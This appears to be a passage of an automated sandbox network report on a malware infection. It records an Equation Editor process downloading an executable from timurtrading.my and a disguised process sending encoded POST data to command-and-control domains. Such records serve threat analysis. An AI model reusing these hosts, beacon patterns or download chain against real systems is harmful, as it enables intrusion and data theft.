                                                                  Oct 21, 2024 11:29:56.228611946 CEST8049165185.196.10.234192.168.2.22
                                                                  Oct 21, 2024 11:29:56.233258963 CEST8049165185.196.10.234192.168.2.22
                                                                  Oct 21, 2024 11:29:57.280606985 CEST8049165185.196.10.234192.168.2.22
                                                                  Oct 21, 2024 11:29:57.419287920 CEST8049165185.196.10.234192.168.2.22
                                                                  Oct 21, 2024 11:29:57.419423103 CEST4916580192.168.2.22185.196.10.234
                                                                  Oct 21, 2024 11:29:57.735362053 CEST4916580192.168.2.22185.196.10.234
                                                                  Oct 21, 2024 11:29:58.752388000 CEST4916680192.168.2.22185.196.10.234
                                                                  Oct 21, 2024 11:29:58.757209063 CEST8049166185.196.10.234192.168.2.22
                                                                  Oct 21, 2024 11:29:58.757379055 CEST4916680192.168.2.22185.196.10.234
                                                                  Oct 21, 2024 11:29:58.767724037 CEST4916680192.168.2.22185.196.10.234
                                                                  Oct 21, 2024 11:29:58.772535086 CEST8049166185.196.10.234192.168.2.22
                                                                  Oct 21, 2024 11:29:59.715586901 CEST8049166185.196.10.234192.168.2.22
                                                                  Oct 21, 2024 11:29:59.847347021 CEST8049166185.196.10.234192.168.2.22
                                                                  Oct 21, 2024 11:29:59.847455025 CEST4916680192.168.2.22185.196.10.234
                                                                  Oct 21, 2024 11:30:00.281049967 CEST4916680192.168.2.22185.196.10.234
                                                                  Oct 21, 2024 11:30:01.295452118 CEST4916780192.168.2.22185.196.10.234
                                                                  Oct 21, 2024 11:30:01.300379038 CEST8049167185.196.10.234192.168.2.22
                                                                  Oct 21, 2024 11:30:01.300443888 CEST4916780192.168.2.22185.196.10.234
                                                                  Oct 21, 2024 11:30:01.310566902 CEST4916780192.168.2.22185.196.10.234
                                                                  Oct 21, 2024 11:30:01.315973997 CEST8049167185.196.10.234192.168.2.22
                                                                  Oct 21, 2024 11:30:01.316041946 CEST8049167185.196.10.234192.168.2.22
                                                                  Oct 21, 2024 11:30:01.316056013 CEST4916780192.168.2.22185.196.10.234
                                                                  Oct 21, 2024 11:30:01.320930958 CEST8049167185.196.10.234192.168.2.22
                                                                  Oct 21, 2024 11:30:01.320952892 CEST8049167185.196.10.234192.168.2.22
                                                                  Oct 21, 2024 11:30:02.375142097 CEST8049167185.196.10.234192.168.2.22
                                                                  Oct 21, 2024 11:30:02.513349056 CEST8049167185.196.10.234192.168.2.22
                                                                  Oct 21, 2024 11:30:02.513547897 CEST4916780192.168.2.22185.196.10.234
                                                                  Oct 21, 2024 11:30:02.821022987 CEST4916780192.168.2.22185.196.10.234
                                                                  Oct 21, 2024 11:30:03.838987112 CEST4916880192.168.2.22185.196.10.234
                                                                  Oct 21, 2024 11:30:03.843970060 CEST8049168185.196.10.234192.168.2.22
                                                                  Oct 21, 2024 11:30:03.844042063 CEST4916880192.168.2.22185.196.10.234
                                                                  Oct 21, 2024 11:30:03.853760004 CEST4916880192.168.2.22185.196.10.234
                                                                  Oct 21, 2024 11:30:03.858655930 CEST8049168185.196.10.234192.168.2.22
                                                                  Oct 21, 2024 11:30:04.818850040 CEST8049168185.196.10.234192.168.2.22
                                                                  Oct 21, 2024 11:30:04.935703993 CEST8049168185.196.10.234192.168.2.22
                                                                  Oct 21, 2024 11:30:04.935872078 CEST4916880192.168.2.22185.196.10.234
                                                                  Oct 21, 2024 11:30:04.937066078 CEST4916880192.168.2.22185.196.10.234
                                                                  Oct 21, 2024 11:30:04.941962004 CEST8049168185.196.10.234192.168.2.22
                                                                  Oct 21, 2024 11:30:09.992664099 CEST4916980192.168.2.2215.197.148.33
                                                                  Oct 21, 2024 11:30:09.997661114 CEST804916915.197.148.33192.168.2.22
                                                                  Oct 21, 2024 11:30:09.997761011 CEST4916980192.168.2.2215.197.148.33
                                                                  Oct 21, 2024 11:30:10.008263111 CEST4916980192.168.2.2215.197.148.33
                                                                  Oct 21, 2024 11:30:10.013381958 CEST804916915.197.148.33192.168.2.22
                                                                  Oct 21, 2024 11:30:10.013494968 CEST804916915.197.148.33192.168.2.22
                                                                  Oct 21, 2024 11:30:10.013587952 CEST4916980192.168.2.2215.197.148.33
                                                                  Oct 21, 2024 11:30:10.018476009 CEST804916915.197.148.33192.168.2.22
                                                                  Oct 21, 2024 11:30:10.623228073 CEST804916915.197.148.33192.168.2.22
                                                                  Oct 21, 2024 11:30:10.623290062 CEST4916980192.168.2.2215.197.148.33
                                                                  Oct 21, 2024 11:30:11.510698080 CEST4916980192.168.2.2215.197.148.33
                                                                  Oct 21, 2024 11:30:11.515595913 CEST804916915.197.148.33192.168.2.22
                                                                  Oct 21, 2024 11:30:12.534244061 CEST4917080192.168.2.2215.197.148.33
                                                                  Oct 21, 2024 11:30:12.821980953 CEST804917015.197.148.33192.168.2.22
                                                                  Oct 21, 2024 11:30:12.822216988 CEST4917080192.168.2.2215.197.148.33
                                                                  Oct 21, 2024 11:30:12.847484112 CEST4917080192.168.2.2215.197.148.33
                                                                  Oct 21, 2024 11:30:12.852469921 CEST804917015.197.148.33192.168.2.22
                                                                  Oct 21, 2024 11:30:13.462574959 CEST804917015.197.148.33192.168.2.22
                                                                  Oct 21, 2024 11:30:13.462714911 CEST4917080192.168.2.2215.197.148.33
                                                                  Oct 21, 2024 11:30:14.349473953 CEST4917080192.168.2.2215.197.148.33
                                                                  Oct 21, 2024 11:30:14.354396105 CEST804917015.197.148.33192.168.2.22
                                                                  Oct 21, 2024 11:30:15.390327930 CEST4917180192.168.2.2215.197.148.33
                                                                  Oct 21, 2024 11:30:15.395363092 CEST804917115.197.148.33192.168.2.22
                                                                  Oct 21, 2024 11:30:15.395435095 CEST4917180192.168.2.2215.197.148.33
                                                                  Oct 21, 2024 11:30:15.410162926 CEST4917180192.168.2.2215.197.148.33
                                                                  Oct 21, 2024 11:30:15.415071964 CEST804917115.197.148.33192.168.2.22
                                                                  Oct 21, 2024 11:30:15.415116072 CEST804917115.197.148.33192.168.2.22
                                                                  Oct 21, 2024 11:30:15.415138006 CEST4917180192.168.2.2215.197.148.33
                                                                  Oct 21, 2024 11:30:15.420187950 CEST804917115.197.148.33192.168.2.22
                                                                  Oct 21, 2024 11:30:15.420224905 CEST804917115.197.148.33192.168.2.22
                                                                  Oct 21, 2024 11:30:16.014611959 CEST804917115.197.148.33192.168.2.22
                                                                  Oct 21, 2024 11:30:16.014692068 CEST4917180192.168.2.2215.197.148.33
                                                                  Oct 21, 2024 11:30:16.923504114 CEST4917180192.168.2.2215.197.148.33
                                                                  Oct 21, 2024 11:30:16.928419113 CEST804917115.197.148.33192.168.2.22
                                                                  Oct 21, 2024 11:30:17.941096067 CEST4917280192.168.2.2215.197.148.33
                                                                  Oct 21, 2024 11:30:17.946014881 CEST804917215.197.148.33192.168.2.22
                                                                  Oct 21, 2024 11:30:17.946124077 CEST4917280192.168.2.2215.197.148.33
                                                                  Oct 21, 2024 11:30:17.953142881 CEST4917280192.168.2.2215.197.148.33
                                                                  Oct 21, 2024 11:30:17.958384991 CEST804917215.197.148.33192.168.2.22
                                                                  Oct 21, 2024 11:30:25.651590109 CEST804917215.197.148.33192.168.2.22
                                                                  Oct 21, 2024 11:30:25.652081013 CEST804917215.197.148.33192.168.2.22
                                                                  Oct 21, 2024 11:30:25.652138948 CEST4917280192.168.2.2215.197.148.33
                                                                  Oct 21, 2024 11:30:25.654726982 CEST4917280192.168.2.2215.197.148.33
                                                                  Oct 21, 2024 11:30:25.659904003 CEST804917215.197.148.33192.168.2.22
                                                                  Oct 21, 2024 11:30:30.681408882 CEST4917380192.168.2.2215.197.148.33
                                                                  Oct 21, 2024 11:30:30.686774015 CEST804917315.197.148.33192.168.2.22
                                                                  Oct 21, 2024 11:30:30.686852932 CEST4917380192.168.2.2215.197.148.33
                                                                  Oct 21, 2024 11:30:30.698054075 CEST4917380192.168.2.2215.197.148.33
                                                                  Oct 21, 2024 11:30:30.703020096 CEST804917315.197.148.33192.168.2.22
                                                                  Oct 21, 2024 11:30:30.703071117 CEST4917380192.168.2.2215.197.148.33
                                                                  Oct 21, 2024 11:30:30.703169107 CEST804917315.197.148.33192.168.2.22
                                                                  Oct 21, 2024 11:30:30.707916021 CEST804917315.197.148.33192.168.2.22
                                                                  Oct 21, 2024 11:30:32.211569071 CEST4917380192.168.2.2215.197.148.33
                                                                  Oct 21, 2024 11:30:32.217035055 CEST804917315.197.148.33192.168.2.22
                                                                  Oct 21, 2024 11:30:32.219849110 CEST4917380192.168.2.2215.197.148.33
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Oct 21, 2024 11:28:46.799599886 CEST5456253192.168.2.228.8.8.8
                                                                  Oct 21, 2024 11:28:46.840807915 CEST53545628.8.8.8192.168.2.22
                                                                  Oct 21, 2024 11:29:40.297533989 CEST5291753192.168.2.228.8.8.8
                                                                  Oct 21, 2024 11:29:40.309072971 CEST53529178.8.8.8192.168.2.22
                                                                  Oct 21, 2024 11:29:45.216222048 CEST6275153192.168.2.228.8.8.8
                                                                  Oct 21, 2024 11:29:45.224750042 CEST53627518.8.8.8192.168.2.22
                                                                  Oct 21, 2024 11:29:56.106566906 CEST5789353192.168.2.228.8.8.8
                                                                  Oct 21, 2024 11:29:56.206033945 CEST53578938.8.8.8192.168.2.22
                                                                  Oct 21, 2024 11:30:09.939683914 CEST5482153192.168.2.228.8.8.8
                                                                  Oct 21, 2024 11:30:09.985392094 CEST53548218.8.8.8192.168.2.22
                                                                  Oct 21, 2024 11:30:30.661333084 CEST5471953192.168.2.228.8.8.8
                                                                  Oct 21, 2024 11:30:30.674455881 CEST53547198.8.8.8192.168.2.22
                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Oct 21, 2024 11:28:46.799599886 CEST192.168.2.228.8.8.80x8ecStandard query (0)timurtrading.myA (IP address)IN (0x0001)false
                                                                  Oct 21, 2024 11:29:40.297533989 CEST192.168.2.228.8.8.80x6afbStandard query (0)www.omnibizlux.bizA (IP address)IN (0x0001)false
                                                                  Oct 21, 2024 11:29:45.216222048 CEST192.168.2.228.8.8.80xd964Standard query (0)www.sqlite.orgA (IP address)IN (0x0001)false
                                                                  Oct 21, 2024 11:29:56.106566906 CEST192.168.2.228.8.8.80xdd49Standard query (0)www.75e296qdx.topA (IP address)IN (0x0001)false
                                                                  Oct 21, 2024 11:30:09.939683914 CEST192.168.2.228.8.8.80x1858Standard query (0)www.myprefpal.xyzA (IP address)IN (0x0001)false
                                                                  Oct 21, 2024 11:30:30.661333084 CEST192.168.2.228.8.8.80xfd37Standard query (0)www.jilifish.winA (IP address)IN (0x0001)false
                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Oct 21, 2024 11:28:46.840807915 CEST8.8.8.8192.168.2.220x8ecNo error (0)timurtrading.my192.3.255.145A (IP address)IN (0x0001)false
                                                                  Oct 21, 2024 11:29:40.309072971 CEST8.8.8.8192.168.2.220x6afbNo error (0)www.omnibizlux.biz167.172.133.32A (IP address)IN (0x0001)false
                                                                  Oct 21, 2024 11:29:45.224750042 CEST8.8.8.8192.168.2.220xd964No error (0)www.sqlite.org45.33.6.223A (IP address)IN (0x0001)false
                                                                  Oct 21, 2024 11:29:56.206033945 CEST8.8.8.8192.168.2.220xdd49No error (0)www.75e296qdx.top185.196.10.234A (IP address)IN (0x0001)false
                                                                  Oct 21, 2024 11:30:09.985392094 CEST8.8.8.8192.168.2.220x1858No error (0)www.myprefpal.xyzmyprefpal.xyzCNAME (Canonical name)IN (0x0001)false
                                                                  Oct 21, 2024 11:30:09.985392094 CEST8.8.8.8192.168.2.220x1858No error (0)myprefpal.xyz15.197.148.33A (IP address)IN (0x0001)false
                                                                  Oct 21, 2024 11:30:09.985392094 CEST8.8.8.8192.168.2.220x1858No error (0)myprefpal.xyz3.33.130.190A (IP address)IN (0x0001)false
                                                                  Oct 21, 2024 11:30:30.674455881 CEST8.8.8.8192.168.2.220xfd37No error (0)www.jilifish.winjilifish.winCNAME (Canonical name)IN (0x0001)false
                                                                  Oct 21, 2024 11:30:30.674455881 CEST8.8.8.8192.168.2.220xfd37No error (0)jilifish.win15.197.148.33A (IP address)IN (0x0001)false
                                                                  Oct 21, 2024 11:30:30.674455881 CEST8.8.8.8192.168.2.220xfd37No error (0)jilifish.win3.33.130.190A (IP address)IN (0x0001)false
                                                                  • timurtrading.my
                                                                  • www.omnibizlux.biz
                                                                  • www.sqlite.org
                                                                  • www.75e296qdx.top
                                                                  • www.myprefpal.xyz
                                                                  • www.jilifish.win
                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.2249161192.3.255.145803656C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 21, 2024 11:28:46.860932112 CEST317OUTGET /kontempt2.1.exe HTTP/1.1
                                                                  Accept: */*
                                                                  Accept-Encoding: gzip, deflate
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                  Host: timurtrading.my
                                                                  Connection: Keep-Alive
                                                                  Oct 21, 2024 11:28:47.547101021 CEST369INHTTP/1.1 301 Moved Permanently
                                                                  Server: nginx
                                                                  Date: Mon, 21 Oct 2024 09:28:47 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 162
                                                                  Connection: keep-alive
                                                                  Location: https://timurtrading.my/kontempt2.1.exe
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  1192.168.2.2249163167.172.133.32801596C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 21, 2024 11:29:40.373928070 CEST415OUTGET /8pmv/?eDZh=0pI0vDB&IDX46=o+HDgodiamRQHtDMpIt6QXV1yFQyIuHAMV1gOVYcjWmvuGh+h7IrtYfSQO/kpwxsxn8zwcxo4M/m/nbjbIRZpxhbjjpUXySeQkriE3Dek1xl8vaSGOlLDW237/Ca HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                  Accept-Language: en-US
                                                                  Connection: close
                                                                  Host: www.omnibizlux.biz
                                                                  User-Agent: Opera/9.80 (Android 4.0.4; Linux; Opera Tablet/ADR-1411061201) Presto/2.11.355 Version/12.10
                                                                  Oct 21, 2024 11:29:41.028116941 CEST303INHTTP/1.1 404 Not Found
                                                                  Server: nginx/1.26.1
                                                                  Date: Mon, 21 Oct 2024 09:29:40 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 153
                                                                  Connection: close
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  2192.168.2.224916445.33.6.223803900C:\Windows\SysWOW64\msinfo32.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 21, 2024 11:29:45.238112926 CEST232OUTGET /2022/sqlite-dll-win32-x86-3380000.zip HTTP/1.1
                                                                  User-Agent: Opera/9.80 (Android 4.0.4; Linux; Opera Tablet/ADR-1411061201) Presto/2.11.355 Version/12.10
                                                                  Host: www.sqlite.org
                                                                  Connection: Keep-Alive
                                                                  Cache-Control: no-cache
                                                                  Oct 21, 2024 11:29:45.847716093 CEST249INHTTP/1.1 200 OK
                                                                  Connection: keep-alive
                                                                  Date: Mon, 21 Oct 2024 09:29:45 GMT
                                                                  Last-Modified: Sat, 12 Mar 2022 13:56:34 GMT
                                                                  Cache-Control: max-age=120
                                                                  ETag: "m622ca692s8a577"
                                                                  Content-type: application/zip; charset=utf-8
                                                                  Content-length: 566647
                                                                  Oct 21, 2024 11:29:45.847768068 CEST1236INData Raw: 50 4b 03 04 14 00 00 00 08 00 a6 12 57 54 f6 08 b2 ad 9e 06 00 00 c6 1c 00 00 0b 00 1c 00 73 71 6c 69 74 65 33 2e 64 65 66 55 54 09 00 03 a8 37 15 62 a8 37 15 62 75 78 0b 00 01 04 e8 03 00 00 04 e8 03 00 00 85 98 c9 b2 dd 26 10 40 f7 fe 1b fb a5
                                                                  Data Ascii: PKWTsqlite3.defUT7b7bux&@\JN$$@f>pE7 g/zo_+s|rNC;M7Pn5j-QP0J=oS&sMeJ#*[4l
                                                                  Oct 21, 2024 11:29:45.847830057 CEST212INData Raw: 67 ce 41 d7 51 d3 f3 46 77 29 18 6c 67 31 7c 11 2c fe 7e 4a 49 3b 77 52 12 62 6f 4a 43 ec a4 62 59 6a 96 5a a8 9a 86 bb a6 41 7d e7 c9 2d df 0f f7 aa 71 a7 e0 bc 45 a9 7f bd 50 fe 60 6e da 3a 66 7a f3 ae 1d d2 05 09 b2 1a f6 e0 1c ec 1b 5c ba 7e
                                                                  Data Ascii: gAQFw)lg1|,~JI;wRboJCbYjZA}-qEP`n:fz\~66#]yymyVrhUUG^X8rO=4g-HC2(nHMx &e^`@+pi?JWGHqcAD 4$R
                                                                  Oct 21, 2024 11:29:45.847841024 CEST1236INData Raw: 31 94 3e 61 f2 c4 7c bb 86 b4 c2 88 9f 39 6e 5d d3 c3 bb 2d 7c 86 f8 a4 a3 fc 51 61 cb 96 a2 86 d3 0e 1a e4 fa 65 90 50 e4 17 ce b0 89 d3 11 6e 54 00 28 bb f0 ce 2b 92 7b aa e8 03 65 72 af e5 f0 46 0c a3 d6 41 6b c2 68 c5 09 04 da 6a 32 3e df b5
                                                                  Data Ascii: 1>a|9n]-|QaePnT(+{erFAkhj2>=T?G'PI*"'B:7{Jqy=:kbJOQcC+L7&JoAqcbCKUKIyOD6BH4lPw$057)#8C
                                                                  Oct 21, 2024 11:29:45.847858906 CEST1236INData Raw: 01 90 ec 0d da 50 71 d9 a0 bf b0 4f d3 e1 53 65 a7 50 71 10 53 9b 09 82 88 f1 d0 ee a4 a6 ac 44 1e 89 14 59 96 68 86 f7 04 62 4b 0c b6 ca 3d 16 39 02 1b cd 41 95 b5 be 62 f5 7e c3 5e 1b 78 34 18 0c 8e d6 ff 3d ec 63 ec f2 87 be 80 2e af 25 8d 62
                                                                  Data Ascii: PqOSePqSDYhbK=9Ab~^x4=c.%b{f=)YgJjKqfe(1FLM^a_vO-(~ux[c)2CCi`04*aB'&@^c3bGy^OQ'LYI#+*6zkb
                                                                  Oct 21, 2024 11:29:45.847867966 CEST1236INData Raw: f6 47 3d 45 42 4d 0d fe 24 5f 96 4c 2e b5 63 15 69 5e 13 9a 16 d4 83 3b 58 ac bd b6 b2 4d 78 ab b6 bf 5d b5 e0 f8 14 aa ff c9 36 74 7d 15 c3 34 c8 07 40 ea 85 41 0a 87 5d 54 d9 c6 c0 c4 cc a7 fd 0b b8 ca da f2 59 f0 2d 58 96 2a d4 70 30 6c 42 8d
                                                                  Data Ascii: G=EBM$_L.ci^;XMx]6t}4@A]TY-X*p0lBO+gV5+jEyo_@FW#u6m61SpUC4=s&oyss{XUHFX_zAke{`q~ ry%s1$fZpx8*4{W\^
                                                                  Oct 21, 2024 11:29:45.847878933 CEST636INData Raw: dd 4c 5e 80 bd 0a 44 68 87 ad ca 9f ea c7 f9 2a 45 fa b3 aa cc aa 60 5a 9c c2 3b 0e 96 5f 82 0e 34 c1 0e ca 98 48 7b 1b b9 e8 14 6a 72 82 b0 1d 4c d2 77 33 ee c0 4b 6d 7f de f4 e8 6f d4 4b b8 9b 6a e3 0d 7b 02 2d b0 90 13 c0 16 de 46 5a 49 6e af
                                                                  Data Ascii: L^Dh*E`Z;_4H{jrLw3KmoKj{-FZInRG*?2{jfS$uuYSg)@'4K0cEyf:[*wYwz{jvY_08T0~2QKPZBC&zgpj)x!w0
                                                                  Oct 21, 2024 11:29:45.847896099 CEST1236INData Raw: a9 37 a5 cc bb 29 25 fd a6 94 ac 9b 52 72 20 65 61 9a b5 e4 7b 3a 73 d8 40 17 a1 d4 32 99 b4 da db fa 2f d3 d5 b2 a5 b2 53 52 81 a8 3c b5 3d ed 5d c1 60 28 9d 06 04 e2 48 9d 62 92 cf 45 09 35 59 26 cb d1 01 b9 8b 53 53 48 ab 7f 03 b7 db 8b 2d 6c
                                                                  Data Ascii: 7)%Rr ea{:s@2/SR<=]`(HbE5Y&SSH-l?9h-L!ocdm2labzX)i@v%yz;uL$QW+uMSIfH|cFydXm$/`2M&>ggd<osAC#(j\F>`
                                                                  Oct 21, 2024 11:29:45.847906113 CEST212INData Raw: 1c 26 cd 75 4a 5c dd 97 71 5c 13 69 de 7e 0e 9a 64 b8 1b fe 19 b8 b3 75 01 73 5d 97 99 1b e0 9a 59 4e d2 44 ea 00 ac 2e 10 c7 1d e6 86 49 d3 dd 08 ba fd 4b 84 ad 53 cc 75 5f 9a b9 b3 fe f8 28 ee 2a 62 ff 00 99 cc 14 90 a9 35 36 d1 57 36 c7 c8 36
                                                                  Data Ascii: &uJ\q\i~dus]YND.IKSu_(*b56W661d?<,sTx6|j<X.K2E]]'3&wemqS6&wQ(c9NLE'_{pM&&f*
                                                                  Oct 21, 2024 11:29:45.847920895 CEST1236INData Raw: 7c 9b a0 29 a6 aa 3c 5e a8 71 f2 61 bb 0a 36 cb 99 8e 4c cd 37 5f 05 83 8d ae 98 31 0d 38 4e b5 f7 15 a6 2a 0d 8d 96 af 2c 1a 84 e3 ab 62 16 88 0a a4 29 2d 3b 4f 8c ed cb 8e 73 ee 8a 84 c1 96 ec 74 cd 62 18 c5 a4 b4 34 71 b6 23 9f 97 66 56 bb af
                                                                  Data Ascii: |)<^qa6L7_18N*,b)-;Ostb4q#fVsA!o*gP*z^K4otj_3}}UOcS"{)jdvHLGSKWe({)&ue9,FC{._.^f1#r4F"doq~~{'F
                                                                  Oct 21, 2024 11:29:45.852880001 CEST1236INData Raw: 03 25 0f 77 44 a4 c0 53 47 8b dc 1c 64 da bc ce c0 e9 8e 92 bb 3a bc 23 c5 d4 3d e2 fb dc 52 4c dc d7 3b 5e b9 7e d6 db db f1 ca 08 05 2a ee b9 a6 46 9e 6e 57 8d a7 db 71 fb af 67 3c 81 50 b3 34 06 aa 4f 9d d6 26 f7 80 b6 bf 5f 67 eb c4 96 e8 f7
                                                                  Data Ascii: %wDSGd:#=RL;^~*FnWqg<P4O&_g(/]Bf|zsm5t}lt}O``pC<mb~fcf)\fN47Y]t%M $E[;#!m1Zl|qulN3v}d^f


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  3192.168.2.2249165185.196.10.234801596C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 21, 2024 11:29:56.223706007 CEST2472OUTPOST /quvp/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                  Accept-Language: en-US
                                                                  Accept-Encoding: gzip, deflate
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Connection: close
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 2162
                                                                  Host: www.75e296qdx.top
                                                                  Origin: http://www.75e296qdx.top
                                                                  Referer: http://www.75e296qdx.top/quvp/
                                                                  User-Agent: Opera/9.80 (Android 4.0.4; Linux; Opera Tablet/ADR-1411061201) Presto/2.11.355 Version/12.10
                                                                  Data Raw: 49 44 58 34 36 3d 55 55 64 41 39 57 75 66 65 6e 46 41 52 57 58 6d 37 41 38 4a 69 66 77 39 31 4f 30 30 64 66 7a 77 6f 38 6d 6c 71 68 50 6e 73 4d 53 43 64 48 2b 50 38 64 43 54 37 54 43 37 6f 55 57 30 47 39 63 66 2f 4f 6c 59 4d 6d 58 37 61 4e 44 76 4e 53 34 4a 68 7a 49 6e 6d 46 72 69 46 68 4d 6c 55 35 61 6d 37 33 2f 52 62 56 5a 50 66 41 51 30 32 61 66 50 35 4c 30 52 62 68 6f 65 64 56 69 37 68 59 66 2f 42 78 64 55 34 48 2b 61 6f 75 33 75 56 34 6f 66 58 71 55 70 55 30 68 51 62 64 68 4a 79 73 31 43 5a 75 36 54 78 30 47 66 30 54 77 31 4f 4f 42 42 6a 6c 5a 38 64 36 54 31 6c 61 6f 78 4e 2b 62 62 65 50 4c 34 4f 4b 6f 39 59 75 63 30 32 5a 58 4a 67 6a 35 75 79 45 4a 64 7a 41 37 6b 31 33 47 73 73 75 77 78 38 48 47 6c 6d 4a 78 4e 79 55 43 51 77 59 41 78 4e 6c 6f 42 33 78 59 6a 2b 31 4c 4a 6d 37 66 78 76 6d 63 2b 49 32 57 44 4c 62 71 4d 71 78 41 4f 42 77 41 2f 48 6a 4c 35 63 6a 78 31 64 39 7a 56 51 71 50 41 63 34 76 41 7a 63 51 57 65 2b 68 78 75 61 63 70 53 62 30 79 4e 43 72 34 75 55 36 71 72 38 53 65 61 6d 79 45 [TRUNCATED]
                                                                  Data Ascii: IDX46=UUdA9WufenFARWXm7A8Jifw91O00dfzwo8mlqhPnsMSCdH+P8dCT7TC7oUW0G9cf/OlYMmX7aNDvNS4JhzInmFriFhMlU5am73/RbVZPfAQ02afP5L0RbhoedVi7hYf/BxdU4H+aou3uV4ofXqUpU0hQbdhJys1CZu6Tx0Gf0Tw1OOBBjlZ8d6T1laoxN+bbePL4OKo9Yuc02ZXJgj5uyEJdzA7k13Gssuwx8HGlmJxNyUCQwYAxNloB3xYj+1LJm7fxvmc+I2WDLbqMqxAOBwA/HjL5cjx1d9zVQqPAc4vAzcQWe+hxuacpSb0yNCr4uU6qr8SeamyEOkst0MvB+acwDAY4DmQ8FQ5Cm+KE3nAMRO0yj3LSa+rEF4dwTFFDpGv+6fhGCWcJzYBrUZN3VACA5RDDskyZHk9tBQCMqwz2m+cvcLFq4k4E6jrqBDwvy1cm3jZg6PdnxlW5DlK94yqLaZOG4dHidq3LeqPCgV0IrXgDNw5sfKj/nc81bRNSyUdPv/8O5xXLiQTHav1XRJSL8EohHSTBYlArx6E7Hyl118C8np10U8a2g22S9lkZ5SpW+0AeLD8ydojFWZb8DSGo0zvzUSNP3DtCZA3tmhE2mESBrUsNzNVYUgRLAVCbb3na+1o7IWF7Qtyi4tL3RMaMbSJLfAa9MHrUTUKTbqhG8c7dc9jSpcWb7PU7gZKCYiGi67K7OGCU0nW+VuD1b58XrT7ut+XjnkEauHPV2pPMUX9oGIr/ydU5YSMrD2/uhaoRVMPyhETtqAWcv/9HYtFNQ51WsDjflrQWPj1sEg5HcUvov862HHNRhgli+KAMt4AHzNp+NU5Q3qmjlJc4DdCWCHIiUSsM67dPcC7Gb8CPRCYETOBnGlMF0189znyDbIPZ1ghLyqrtR/sG6FF0ChuioFu4smsxOjTnF0aICUkqyfiip2YsQAZYn1fV3bofoQX1KJA1xs6XsQC/n3MbAKYBEr4PjPV0nlhgxY8q+wz/aX [TRUNCATED]
                                                                  Oct 21, 2024 11:29:56.228548050 CEST164OUTData Raw: 46 64 78 71 55 35 41 53 54 48 79 59 59 52 34 36 2f 52 48 36 70 61 5a 65 6c 4c 56 76 46 37 2b 4c 67 6a 32 54 41 77 2f 30 4a 56 4b 74 51 48 75 61 34 4a 62 31 6a 7a 50 4c 39 46 65 31 36 4f 4c 2b 48 5a 4b 52 5a 55 46 4e 2b 6f 64 46 4d 6a 4d 46 5a 30
                                                                  Data Ascii: FdxqU5ASTHyYYR46/RH6paZelLVvF7+Lgj2TAw/0JVKtQHua4Jb1jzPL9Fe16OL+HZKRZUFN+odFMjMFZ0tCVF9LxYDxnJxgC+8WI06Oi5F590126ILpdC9M/oey/6UjezPBgQg+I6JzZQkUevQ3OeFuZDVdPsr1g1zb
